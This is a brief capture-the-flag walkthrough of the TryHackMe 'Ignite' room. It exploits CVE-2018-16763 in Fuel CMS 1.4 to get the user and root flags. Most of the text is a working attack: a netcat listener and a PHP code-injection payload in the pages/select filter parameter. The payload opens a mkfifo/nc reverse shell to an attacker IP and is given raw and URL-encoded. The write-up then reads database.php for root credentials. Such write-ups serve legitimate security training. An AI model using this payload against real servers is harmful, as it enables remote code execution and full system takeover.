Link: https://tryhackme.com/room/ignite
#1 “User.txt“
First, we access: http://10.10.237.127/
We found that this page is using Fuel CMS version 1.4. Do a little research and we know that it has a vulnerability named CVE-2018-16763.
Scroll down and we found a login link with a credential of the admin.
After login, we can exploit the vuln. This page is vulnerable in this link:
http://10.10.237.127/fuel/pages/select/?filter=Stand up a netcat listener on port 1234.
nc -lvnp 1234Trigger our shell with payload:
'+pi(print($a='system'))+$a('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')+'URL encode:
http://10.10.237.127/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.6.63.158%201234%20%3E%2Ftmp%2Ff%27%29%2b%27
And we found the user’s flag.
#2 “Root.txt”
We enumerate the web page folder and we can find the database file in /var/www/html/fuel/application/config/database.php.
Read that file and we found the root’s credential.
su -and we found the root’s flag.
ethan 